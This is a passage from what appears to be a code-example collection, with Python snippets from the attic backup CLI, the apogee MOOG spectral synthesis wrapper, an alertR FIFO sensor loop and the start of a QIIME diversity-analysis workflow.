                               help='paths to archive')

        extract_epilog = textwrap.dedent("""
        This command extracts the contents of an archive. By default the entire
        archive is extracted but a subset of files and directories can be selected
        by passing a list of ``PATHs`` as arguments. The file selection can further
        be restricted by using the ``--exclude`` option.

        See "attic help patterns" for more help on exclude patterns.
        """)
        subparser = subparsers.add_parser('extract', parents=[common_parser],
                                          description=self.do_extract.__doc__,
                                          epilog=extract_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_extract)
        subparser.add_argument('-n', '--dry-run', dest='dry_run',
                               default=False, action='store_true',
                               help='do not actually change any files')
        subparser.add_argument('-e', '--exclude', dest='excludes',
                               type=ExcludePattern, action='append',
                               metavar="PATTERN", help='exclude paths matching PATTERN')
        subparser.add_argument('--exclude-from', dest='exclude_files',
                               type=argparse.FileType('r'), action='append',
                               metavar='EXCLUDEFILE', help='read exclude patterns from EXCLUDEFILE, one per line')
        subparser.add_argument('--numeric-owner', dest='numeric_owner',
                               action='store_true', default=False,
                               help='only obey numeric user and group identifiers')
        subparser.add_argument('--strip-components', dest='strip_components',
                               type=int, default=0, metavar='NUMBER',
                               help='Remove the specified number of leading path elements. Pathnames with fewer elements will be silently skipped.')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to extract')
        subparser.add_argument('paths', metavar='PATH', nargs='*', type=str,
                               help='paths to extract')

        delete_epilog = textwrap.dedent("""
        This command deletes an archive from the repository. Any disk space not
        shared with any other existing archive is also reclaimed.
        """)
        subparser = subparsers.add_parser('delete', parents=[common_parser],
                                          description=self.do_delete.__doc__,
                                          epilog=delete_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_delete)
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the deleted archive')
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to delete')

        list_epilog = textwrap.dedent("""
        This command lists the contents of a repository or an archive.
        """)
        subparser = subparsers.add_parser('list', parents=[common_parser],
                                          description=self.do_list.__doc__,
                                          epilog=list_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_list)
        subparser.add_argument('src', metavar='REPOSITORY_OR_ARCHIVE', type=location_validator(),
                               help='repository/archive to list contents of')
        mount_epilog = textwrap.dedent("""
        This command mounts an archive as a FUSE filesystem. This can be useful for
        browsing an archive or restoring individual files. Unless the ``--foreground``
        option is given the command will run in the background until the filesystem
        is ``umounted``.
        """)
        subparser = subparsers.add_parser('mount', parents=[common_parser],
                                          description=self.do_mount.__doc__,
                                          epilog=mount_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_mount)
        subparser.add_argument('src', metavar='REPOSITORY_OR_ARCHIVE', type=location_validator(),
                               help='repository/archive to mount')
        subparser.add_argument('mountpoint', metavar='MOUNTPOINT', type=str,
                               help='where to mount filesystem')
        subparser.add_argument('-f', '--foreground', dest='foreground',
                               action='store_true', default=False,
                               help='stay in foreground, do not daemonize')
        subparser.add_argument('-o', dest='options', type=str,
                               help='Extra mount options')

        info_epilog = textwrap.dedent("""
        This command displays some detailed information about the specified archive.
        """)
        subparser = subparsers.add_parser('info', parents=[common_parser],
                                          description=self.do_info.__doc__,
                                          epilog=info_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_info)
        subparser.add_argument('archive', metavar='ARCHIVE',
                               type=location_validator(archive=True),
                               help='archive to display information about')

        prune_epilog = textwrap.dedent("""
        The prune command prunes a repository by deleting archives not matching
        any of the specified retention options. This command is normally used by
        automated backup scripts wanting to keep a certain number of historic backups.

        As an example, "-d 7" means to keep the latest backup on each day for 7 days.
        Days without backups do not count towards the total.
        The rules are applied from hourly to yearly, and backups selected by previous
        rules do not count towards those of later rules. The time that each backup
        completes is used for pruning purposes. Dates and times are interpreted in
        the local timezone, and weeks go from Monday to Sunday. Specifying a
        negative number of archives to keep means that there is no limit.

        The "--keep-within" option takes an argument of the form "<int><char>",
        where char is "H", "d", "w", "m", "y". For example, "--keep-within 2d" means
        to keep all archives that were created within the past 48 hours.
        "1m" is taken to mean "31d". The archives kept with this option do not
        count towards the totals specified by any other options.

        If a prefix is set with -p, then only archives that start with the prefix are
        considered for deletion and only those archives count towards the totals
        specified by the rules.
        """)
        subparser = subparsers.add_parser('prune', parents=[common_parser],
                                          description=self.do_prune.__doc__,
                                          epilog=prune_epilog,
                                          formatter_class=argparse.RawDescriptionHelpFormatter)
        subparser.set_defaults(func=self.do_prune)
        subparser.add_argument('-n', '--dry-run', dest='dry_run',
                               default=False, action='store_true',
                               help='do not change repository')
        subparser.add_argument('-s', '--stats', dest='stats',
                               action='store_true', default=False,
                               help='print statistics for the deleted archive')
        subparser.add_argument('--keep-within', dest='within', type=str, metavar='WITHIN',
                               help='keep all archives within this time interval')
        subparser.add_argument('-H', '--keep-hourly', dest='hourly', type=int, default=0,
                               help='number of hourly archives to keep')
        subparser.add_argument('-d', '--keep-daily', dest='daily', type=int, default=0,
                               help='number of daily archives to keep')
        subparser.add_argument('-w', '--keep-weekly', dest='weekly', type=int, default=0,
                               help='number of weekly archives to keep')
        subparser.add_argument('-m', '--keep-monthly', dest='monthly', type=int, default=0,
                               help='number of monthly archives to keep')
        subparser.add_argument('-y', '--keep-yearly', dest='yearly', type=int, default=0,
                               help='number of yearly archives to keep')
        subparser.add_argument('-p', '--prefix', dest='prefix', type=str,
                               help='only consider archive names starting with this prefix')
        subparser.add_argument('repository', metavar='REPOSITORY',
                               type=location_validator(archive=False),
                               help='repository to prune')

        subparser = subparsers.add_parser('help', parents=[common_parser],
                                          description='Extra help')
        subparser.add_argument('--epilog-only', dest='epilog_only',
                               action='store_true', default=False)
        subparser.add_argument('--usage-only', dest='usage_only',
                               action='store_true', default=False)
        subparser.set_defaults(func=functools.partial(self.do_help, parser, subparsers.choices))
        subparser.add_argument('topic', metavar='TOPIC', type=str, nargs='?',
                               help='additional help on TOPIC')

        args = parser.parse_args(args or ['-h'])
        self.verbose = args.verbose
        update_excludes(args)
        return args.func(args)

Example 139

Project: apogee
Source File: moog.py
View license
def moogsynth(*args,**kwargs):
    """
    NAME:
       moogsynth
    PURPOSE:
       Run a MOOG synthesis (direct interface to the MOOG code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves withe LSF and macrotubulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances (they don't all have to have the same length, missing ones are filled in with zeros):
          [Atomic number1,diff1_1,diff1_2,diff1_3,...,diff1_N]
          [Atomic number2,diff2_1,diff2_2,diff2_3,...,diff2_N]
          ...
          [Atomic numberM,diffM_1,diffM_2,diffM_3,...,diffM_N]
    SYNTHEIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'108.00116':'1.001','606.01212':'1.01'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000, 7.0000000) spectral synthesis limits, step, and width of calculation (see MOOG)
       doflux= (False) if True, calculate the continuum flux instead
    LINELIST KEYWORDS:
       linelist= (None) linelist to use; if this is None, the code looks for a weed-out version of the linelist appropriate for the given model atmosphere; otherwise can be set to the path of a linelist file or to the name of an APOGEE linelist
    ATMOSPHERE KEYWORDS:
       Either:
          (a) modelatm= (None) can be set to the filename of a model atmosphere (needs to end in .mod)
          (b) specify the stellar parameters for a grid point in model atm by
              - lib= ('kurucz_filled') spectral library
              - teff= (4500) grid-point Teff
              - logg= (2.5) grid-point logg
              - metals= (0.) grid-point metallicity
              - cm= (0.) grid-point carbon-enhancement
              - am= (0.) grid-point alpha-enhancement
              - dr= return the path corresponding to this data release
       vmicro= (2.) microturbulence (km/s) (only used if the MOOG-formatted atmosphere file doesn't already exist)
    OUTPUT:
       (wavelengths,spectra (nspec,nwave)) for synth driver
       (wavelengths,continuum spectr (nwave)) for doflux driver     
    HISTORY:
       2015-02-13 - Written - Bovy (IAS)
    """
    doflux= kwargs.pop('doflux',False)
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    width= kwargs.pop('width',_WIDTH_DEFAULT)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'1.01',
                   '606.01213':'90',
                   '606.01313':'180',
                   '607.01214':'1.01',
                   '607.01314':'90',
                   '607.01215':'273',
                   '608.01216':'1.01',
                   '608.01316':'90',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'108.00116':'1.001',
                   '606.01212':'0.91',
                   '606.01213':'8',
                   '606.01313':'81',
                   '607.01214':'0.91',
                   '607.01314':'8',
                   '607.01215':'273',
                   '608.01216':'0.91',
                   '608.01316':'8',
                   '608.01217':'1101',
                   '608.01218':'551',
                   '114.00128':'1.011',
                   '114.00129':'20',
                   '114.00130':'30',
                   '101.00101':'1.001',
                   '101.00102':'1000',
                   '126.00156':'1.00'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # Get the filename of the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            modelfilename= modelatm
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input is a non-existing filename')
        else:
            raise ValueError('modelatm= in moogsynth should be set to the name of a file')
    else:
        modelfilename= appath.modelAtmospherePath(**kwargs)
    # Check whether a MOOG version exists
    if not os.path.exists(modelfilename.replace('.mod','.org')):
        # Convert to MOOG format
        convert_modelAtmosphere(modelatm=modelfilename,**kwargs)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelist
    if linelist is None:
        linelistfilename= modelbasename.replace('.mod','.lines')
        if not os.path.exists(os.path.join(modeldirname,linelistfilename)):
            raise IOError('No linelist given and no weed-out version found for this atmosphere; either specify a linelist or run weedout first')
        linelistfilename= os.path.join(modeldirname,linelistfilename)
    elif os.path.exists(linelist):
        linelistfilename= linelist
    else:
        linelistfilename= appath.linelistPath(linelist,
                                              dr=kwargs.get('dr',None))
    if not os.path.exists(linelistfilename):
        raise RuntimeError("Linelist %s not found; download linelist w/ apogee.tools.download.linelist (if you have access)" % linelistfilename)
    # We will run in a subdirectory of the relevant model atmosphere
    tmpDir= tempfile.mkdtemp(dir=modeldirname)
    shutil.copy(linelistfilename,tmpDir)
    # Cut the linelist to the desired wavelength range
    with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
        awkfile.write('$1>%.3f && $1<%.3f\n' %(wmin-width,wmax+width))
    keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
    stderr= open('/dev/null','w')
    try:
        subprocess.check_call(['awk','-f','cutlines.awk',
                               os.path.basename(linelistfilename)],
                              cwd=tmpDir,stdout=keeplines,stderr=stderr)
        keeplines.close()
        shutil.copy(os.path.join(tmpDir,'lines.tmp'),
                    os.path.join(tmpDir,os.path.basename(linelistfilename)))
    except subprocess.CalledProcessError:
        print("Removing unnecessary linelist entries failed ...")
    finally:
        os.remove(os.path.join(tmpDir,'cutlines.awk'))
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        stderr.close()
    # Also copy the strong lines
    stronglinesfilename= appath.linelistPath('stronglines.vac',
                                             dr=kwargs.get('dr',None))
    if not os.path.exists(stronglinesfilename):
        try:
            download.linelist('stronglines.vac',dr=kwargs.get('dr',None))
        except:
            raise RuntimeError("Linelist stronglines.vac not found or downloading failed; download linelist w/ apogee.tools.download.linelist (if you have access)")
        finally:
            if os.path.exists(os.path.join(tmpDir,'synth.par')):
                os.remove(os.path.join(tmpDir,'synth.par'))
            if os.path.exists(os.path.join(tmpDir,'std.out')):
                os.remove(os.path.join(tmpDir,'std.out'))
            if os.path.exists(os.path.join(tmpDir,
                                           os.path.basename(linelistfilename))):
                os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
            if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
                os.remove(os.path.join(tmpDir,'stronglines.vac'))
            os.rmdir(tmpDir)
    shutil.copy(stronglinesfilename,tmpDir)
    # Now write the script file
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    nsynths= numpy.array([len(args[ii])-1 for ii in range(len(args))])
    nsynth= numpy.amax(nsynths) #Take the longest abundance list
    if nsynth > 5:
        raise ValueError("MOOG only allows five syntheses to be run at the same time; please reduce the number of abundance values in the apogee.modelspec.moog.moogsynth input")
    nabu= len(args)
    with open(os.path.join(tmpDir,'synth.par'),'w') as parfile:
        if doflux:
            parfile.write('doflux\n')
        else:
            parfile.write('synth\n')
        parfile.write('terminal x11\n')
        parfile.write('plot 1\n')
        parfile.write("standard_out std.out\n")
        parfile.write("summary_out '../synth.out'\n")
        parfile.write("smoothed_out '/dev/null'\n")
        parfile.write("strong 1\n")
        parfile.write("damping 0\n")
        parfile.write("stronglines_in stronglines.vac\n")
        parfile.write("model_in '../%s'\n" % modelbasename.replace('.mod','.org'))
        parfile.write("lines_in %s\n" % os.path.basename(linelistfilename))
        parfile.write("atmosphere 1\n")
        parfile.write("molecules 2\n")
        parfile.write("lines 1\n")
        parfile.write("flux/int 0\n")
        # Write the isotopes
        niso= len(isotopes)
        parfile.write("isotopes %i %i\n" % (niso,nsynth))
        for iso in isotopes:
            isotopestr= iso
            for ii in range(nsynth):
                isotopestr+= ' '+isotopes[iso]
            parfile.write(isotopestr+'\n')
        # Abundances
        parfile.write("abundances %i %i\n" % (nabu,nsynth))
        for ii in range(nabu):
            abustr= '%i' % args[ii][0]
            for jj in range(nsynth):
                try:
                    abustr+= ' %.3f' % args[ii][jj+1]
                except IndexError:
                    abustr+= ' 0.0'
            parfile.write(abustr+"\n")
        # Synthesis limits
        parfile.write("synlimits\n") # Add 0.001 to make sure wmax is included
        parfile.write("%.3f  %.3f  %.3f  %.3f\n" % (wmin,wmax+0.001,dw,width))
    # Now run synth
    sys.stdout.write('\r'+"Running MOOG synth ...\r")
    sys.stdout.flush()
    try:
        p= subprocess.Popen(['moogsilent'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
        p.stdin.write(b'synth.par\n')
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        print("Running synth failed ...")
    finally:
        if os.path.exists(os.path.join(tmpDir,'synth.par')):
            os.remove(os.path.join(tmpDir,'synth.par'))
        if os.path.exists(os.path.join(tmpDir,'std.out')):
            os.remove(os.path.join(tmpDir,'std.out'))
        if os.path.exists(os.path.join(tmpDir,
                                       os.path.basename(linelistfilename))):
            os.remove(os.path.join(tmpDir,os.path.basename(linelistfilename)))
        if os.path.exists(os.path.join(tmpDir,'stronglines.vac')):
            os.remove(os.path.join(tmpDir,'stronglines.vac'))
        os.rmdir(tmpDir)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()        
    # Now read the output
    wavs= numpy.arange(wmin,wmax+dw,dw)
    if wavs[-1] > wmax+dw/2.: wavs= wavs[:-1]
    if doflux:
        contdata= numpy.loadtxt(os.path.join(modeldirname,'synth.out'),
                                converters={0:lambda x: x.replace('D','E'),
                                            1:lambda x: x.replace('D','E')},
                                usecols=[0,1])
        # Wavelength in summary file appears to be wrong from comparing to 
        # the standard output file
        out= contdata[:,1]
        out/= numpy.nanmean(out) # Make the numbers more manageable
    else:
        with open(os.path.join(modeldirname,'synth.out')) as summfile:
            out= numpy.empty((nsynth,len(wavs)))
            for ii in range(nsynth):
                # Skip to beginning of synthetic spectrum
                while True:
                    line= summfile.readline()
                    if line[0] == 'M': break
                summfile.readline()
                tout= []
                while True:
                    line= summfile.readline()
                    if not line or line[0] == 'A': break
                    tout.extend([float(s) for s in line.split()])
                out[ii]= numpy.array(tout)
    os.remove(os.path.join(modeldirname,'synth.out'))
    if doflux:
        return (wavs,out)
    else:
        return (wavs,1.-out)

Example 140

Project: alertR
Source File: sensor.py
View license
	def run(self):

		while True:

			# check if FIFO file exists
			# => remove it if it does
			if os.path.exists(self.fifoFile):
				try:
					os.remove(self.fifoFile)
				except Exception as e:
					logging.exception("[%s]: Could not delete "
						% self.fileName
						+ "FIFO file of sensor with id '%d'."
						% self.id)
					time.sleep(10)
					continue

			# create a new FIFO file
			try:
				os.umask(self.umask)
				os.mkfifo(self.fifoFile)
			except Exception as e:
				logging.exception("[%s]: Could not create "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			# read FIFO for data
			data = ""
			try:
				fifo = open(self.fifoFile, "r")
				data = fifo.read()
				fifo.close()
			except Exception as e:
				logging.exception("[%s]: Could not read data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				time.sleep(10)
				continue

			logging.debug("[%s]: Received data '%s' from "
				% (self.fileName, data)
				+ "FIFO file of sensor with id '%d'."
				% self.id)

			# parse received data
			try:

				message = json.loads(data)

				# Parse message depending on type.
				# Type: statechange
				if str(message["message"]).upper() == "STATECHANGE":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Set new data.
					if self.sensorDataType == SensorDataType.NONE:
						self.sensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						self.sensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						self.sensorData = float(message["payload"]["data"])

					# Set state.
					self.temporaryState = tempInputState

					# Force state change sending if the data could be changed.
					if self.sensorDataType != SensorDataType.NONE:

						# Create state change object that is
						# send to the server.
						self.forceSendStateLock.acquire()
						self.stateChange = StateChange()
						self.stateChange.clientSensorId = self.id
						if tempInputState == self.triggerState:
							self.stateChange.state = 1
						else:
							self.stateChange.state = 0
						self.stateChange.dataType = tempDataType
						self.stateChange.sensorData = self.sensorData
						self.shouldForceSendState = True
						self.forceSendStateLock.release()

				# Type: sensoralert
				elif str(message["message"]).upper() == "SENSORALERT":

					# Check if state is valid.
					tempInputState = message["payload"]["state"]
					if not self._checkState(tempInputState):
						logging.error("[%s]: Received state "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if hasOptionalData field is valid.
					tempHasOptionalData = message[
						"payload"]["hasOptionalData"]
					if not self._checkHasOptionalData(tempHasOptionalData):
						logging.error("[%s]: Received hasOptionalData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data type is valid.
					tempDataType = message["payload"]["dataType"]
					if not self._checkDataType(tempDataType):
						logging.error("[%s]: Received data type "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					if self.sensorDataType == SensorDataType.NONE:
						tempSensorData = None
					elif self.sensorDataType == SensorDataType.INT:
						tempSensorData = int(message["payload"]["data"])
					elif self.sensorDataType == SensorDataType.FLOAT:
						tempSensorData = float(message["payload"]["data"])

					# Check if hasLatestData field is valid.
					tempHasLatestData = message[
						"payload"]["hasLatestData"]
					if not self._checkHasLatestData(tempHasLatestData):
						logging.error("[%s]: Received hasLatestData field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if changeState field is valid.
					tempChangeState = message[
						"payload"]["changeState"]
					if not self._checkChangeState(tempChangeState):
						logging.error("[%s]: Received changeState field "
							% self.fileName
							+ "from FIFO file of sensor with id '%d' "
							% self.id
							+ "invalid. Ignoring message.")
						continue

					# Check if data should be transfered with the sensor alert
					# => if it should parse it
					tempOptionalData = None
					if tempHasOptionalData:

						tempOptionalData = message["payload"]["optionalData"]

						# check if data is of type dict
						if not isinstance(tempOptionalData, dict):
							logging.warning("[%s]: Received optional data "
								% self.fileName
								+ "from FIFO file of sensor with id '%d' "
								% self.id
								+ "invalid. Ignoring message.")
							continue

					# Set optional data.
					self.hasOptionalData = tempHasOptionalData
					self.optionalData = tempOptionalData

					# Set new data.
					if tempHasLatestData:
						self.sensorData = tempSensorData

					# Set state.
					if tempChangeState:
						self.temporaryState = tempInputState

					# Create sensor alert object that is send to the server.
					self.forceSendAlertLock.acquire()
					self.sensorAlert = SensorAlert()
					self.sensorAlert.clientSensorId = self.id
					if tempInputState == self.triggerState:
						self.sensorAlert.state = 1
					else:
						self.sensorAlert.state = 0
					self.sensorAlert.hasOptionalData = tempHasOptionalData
					self.sensorAlert.optionalData = tempOptionalData
					self.sensorAlert.changeState = tempChangeState
					self.sensorAlert.hasLatestData = tempHasLatestData
					self.sensorAlert.dataType = tempDataType
					self.sensorAlert.sensorData = tempSensorData
					self.shouldForceSendAlert = True
					self.forceSendAlertLock.release()

				# Type: invalid
				else:
					raise ValueError("Received invalid message type.")

			except Exception as e:
				logging.exception("[%s]: Could not parse received data from "
					% self.fileName
					+ "FIFO file of sensor with id '%d'."
					% self.id)
				continue

Example 141

Project: qiime
Source File: core_diversity_analyses.py
View license
def run_core_diversity_analyses(
        biom_fp,
        mapping_fp,
        sampling_depth,
        output_dir,
        qiime_config,
        command_handler=call_commands_serially,
        tree_fp=None,
        params=None,
        categories=None,
        arare_min_rare_depth=10,
        arare_num_steps=10,
        parallel=False,
        suppress_taxa_summary=False,
        suppress_beta_diversity=False,
        suppress_alpha_diversity=False,
        suppress_group_significance=False,
        status_update_callback=print_to_stdout):
    """
    """
    if categories is not None:
        # Validate categories provided by the users
        mapping_data, mapping_comments = \
            parse_mapping_file_to_dict(open(mapping_fp, 'U'))
        metadata_map = MetadataMap(mapping_data, mapping_comments)
        for c in categories:
            if c not in metadata_map.CategoryNames:
                raise ValueError("Category '%s' is not a column header "
                                 "in your mapping file. "
                                 "Categories are case and white space sensitive. Valid "
                                 "choices are: (%s)" % (c, ', '.join(metadata_map.CategoryNames)))
            if metadata_map.hasSingleCategoryValue(c):
                raise ValueError("Category '%s' contains only one value. "
                                 "Categories analyzed here require at least two values." % c)

    else:
        categories = []
    comma_separated_categories = ','.join(categories)
    # prep some variables
    if params is None:
        params = parse_qiime_parameters([])

    create_dir(output_dir)
    index_fp = '%s/index.html' % output_dir
    index_links = []
    commands = []

    # begin logging
    old_log_fps = glob(join(output_dir, 'log_20*txt'))
    log_fp = generate_log_fp(output_dir)
    index_links.append(
        ('Master run log',
         log_fp,
         _index_headers['run_summary']))
    for old_log_fp in old_log_fps:
        index_links.append(
            ('Previous run log',
             old_log_fp,
             _index_headers['run_summary']))
    logger = WorkflowLogger(log_fp,
                            params=params,
                            qiime_config=qiime_config)
    input_fps = [biom_fp, mapping_fp]
    if tree_fp is not None:
        input_fps.append(tree_fp)
    log_input_md5s(logger, input_fps)

    # run 'biom summarize-table' on input BIOM table
    try:
        params_str = get_params_str(params['biom-summarize-table'])
    except KeyError:
        params_str = ''
    biom_table_stats_output_fp = '%s/biom_table_summary.txt' % output_dir
    if not exists(biom_table_stats_output_fp):
        biom_table_summary_cmd = \
            "biom summarize-table -i %s -o %s %s" % \
            (biom_fp, biom_table_stats_output_fp, params_str)
        commands.append([('Generate BIOM table summary',
                          biom_table_summary_cmd)])
    else:
        logger.write("Skipping 'biom summarize-table' as %s exists.\n\n"
                     % biom_table_stats_output_fp)
    index_links.append(('BIOM table statistics',
                        biom_table_stats_output_fp,
                        _index_headers['run_summary']))

    # filter samples with fewer observations than the requested sampling_depth.
    # since these get filtered for some analyses (eg beta diversity after
    # even sampling) it's useful to filter them here so they're filtered
    # from all analyses.
    filtered_biom_fp = "%s/table_mc%d.biom" % (output_dir, sampling_depth)
    if not exists(filtered_biom_fp):
        filter_samples_cmd = "filter_samples_from_otu_table.py -i %s -o %s -n %d" %\
            (biom_fp, filtered_biom_fp, sampling_depth)
        commands.append(
            [('Filter low sequence count samples from table (minimum sequence count: %d)' % sampling_depth,
              filter_samples_cmd)])
    else:
        logger.write("Skipping filter_samples_from_otu_table.py as %s exists.\n\n"
                     % filtered_biom_fp)
    biom_fp = filtered_biom_fp

    # rarify the BIOM table to sampling_depth
    rarefied_biom_fp = "%s/table_even%d.biom" % (output_dir, sampling_depth)
    if not exists(rarefied_biom_fp):
        single_rarefaction_cmd = "single_rarefaction.py -i %s -o %s -d %d" %\
            (biom_fp, rarefied_biom_fp, sampling_depth)
        commands.append(
            [('Rarify the OTU table to %d sequences/sample' % sampling_depth,
              single_rarefaction_cmd)])
    else:
        logger.write("Skipping single_rarefaction.py as %s exists.\n\n"
                     % rarefied_biom_fp)

    # run initial commands and reset the command list
    if len(commands) > 0:
        command_handler(commands,
                        status_update_callback,
                        logger,
                        close_logger_on_success=False)
        commands = []

    if not suppress_beta_diversity:
        bdiv_even_output_dir = '%s/bdiv_even%d/' % (output_dir, sampling_depth)
        # Need to check for the existence of any distance matrices, since the user
        # can select which will be generated.
        existing_dm_fps = glob('%s/*_dm.txt' % bdiv_even_output_dir)
        if len(existing_dm_fps) == 0:
            even_dm_fps = run_beta_diversity_through_plots(
                otu_table_fp=rarefied_biom_fp,
                mapping_fp=mapping_fp,
                output_dir=bdiv_even_output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                # Note: we pass sampling depth=None here as
                # we rarify the BIOM table above and pass that
                # in here.
                sampling_depth=None,
                tree_fp=tree_fp,
                parallel=parallel,
                logger=logger,
                suppress_md5=True,
                status_update_callback=status_update_callback)
        else:
            logger.write("Skipping beta_diversity_through_plots.py as %s exist(s).\n\n"
                         % ', '.join(existing_dm_fps))
            even_dm_fps = [(split(fp)[1].strip('_dm.txt'), fp)
                           for fp in existing_dm_fps]

        # Get make_distance_boxplots parameters
        try:
            params_str = get_params_str(params['make_distance_boxplots'])
        except KeyError:
            params_str = ''

        for bdiv_metric, dm_fp in even_dm_fps:
            for category in categories:
                boxplots_output_dir = '%s/%s_boxplots/' % (bdiv_even_output_dir,
                                                           bdiv_metric)
                plot_output_fp = '%s/%s_Distances.pdf' % (boxplots_output_dir,
                                                          category)
                stats_output_fp = '%s/%s_Stats.txt' % (boxplots_output_dir,
                                                       category)
                if not exists(plot_output_fp):
                    boxplots_cmd = \
                        'make_distance_boxplots.py -d %s -f %s -o %s -m %s -n 999 %s' %\
                        (dm_fp, category, boxplots_output_dir,
                         mapping_fp, params_str)
                    commands.append([('Boxplots (%s)' % category,
                                      boxplots_cmd)])
                else:
                    logger.write("Skipping make_distance_boxplots.py for %s as %s exists.\n\n"
                                 % (category, plot_output_fp))
                index_links.append(('Distance boxplots (%s)' % bdiv_metric,
                                    plot_output_fp,
                                    _index_headers['beta_diversity_even'] % sampling_depth))
                index_links.append(
                    ('Distance boxplots statistics (%s)' % bdiv_metric,
                     stats_output_fp,
                     _index_headers['beta_diversity_even'] % sampling_depth))

            index_links.append(('PCoA plot (%s)' % bdiv_metric,
                                '%s/%s_emperor_pcoa_plot/index.html' %
                                (bdiv_even_output_dir, bdiv_metric),
                                _index_headers['beta_diversity_even'] % sampling_depth))
            index_links.append(('Distance matrix (%s)' % bdiv_metric,
                                '%s/%s_dm.txt' %
                                (bdiv_even_output_dir, bdiv_metric),
                                _index_headers['beta_diversity_even'] % sampling_depth))
            index_links.append(
                ('Principal coordinate matrix (%s)' % bdiv_metric,
                 '%s/%s_pc.txt' %
                 (bdiv_even_output_dir, bdiv_metric),
                 _index_headers['beta_diversity_even'] % sampling_depth))

    if not suppress_alpha_diversity:
        # Alpha rarefaction workflow
        arare_full_output_dir = '%s/arare_max%d/' % (output_dir,
                                                     sampling_depth)
        rarefaction_plots_output_fp = \
            '%s/alpha_rarefaction_plots/rarefaction_plots.html' % arare_full_output_dir
        if not exists(rarefaction_plots_output_fp):
            run_alpha_rarefaction(
                otu_table_fp=biom_fp,
                mapping_fp=mapping_fp,
                output_dir=arare_full_output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                tree_fp=tree_fp,
                num_steps=arare_num_steps,
                parallel=parallel,
                logger=logger,
                min_rare_depth=arare_min_rare_depth,
                max_rare_depth=sampling_depth,
                suppress_md5=True,
                status_update_callback=status_update_callback,
                retain_intermediate_files=False)
        else:
            logger.write("Skipping alpha_rarefaction.py as %s exists.\n\n"
                         % rarefaction_plots_output_fp)

        index_links.append(('Alpha rarefaction plots',
                            rarefaction_plots_output_fp,
                            _index_headers['alpha_diversity']))

        collated_alpha_diversity_fps = \
            glob('%s/alpha_div_collated/*txt' % arare_full_output_dir)
        try:
            params_str = get_params_str(params['compare_alpha_diversity'])
        except KeyError:
            params_str = ''

        if len(categories) > 0:
            for collated_alpha_diversity_fp in collated_alpha_diversity_fps:
                alpha_metric = splitext(
                    split(collated_alpha_diversity_fp)[1])[0]
                compare_alpha_output_dir = '%s/compare_%s' % \
                    (arare_full_output_dir, alpha_metric)
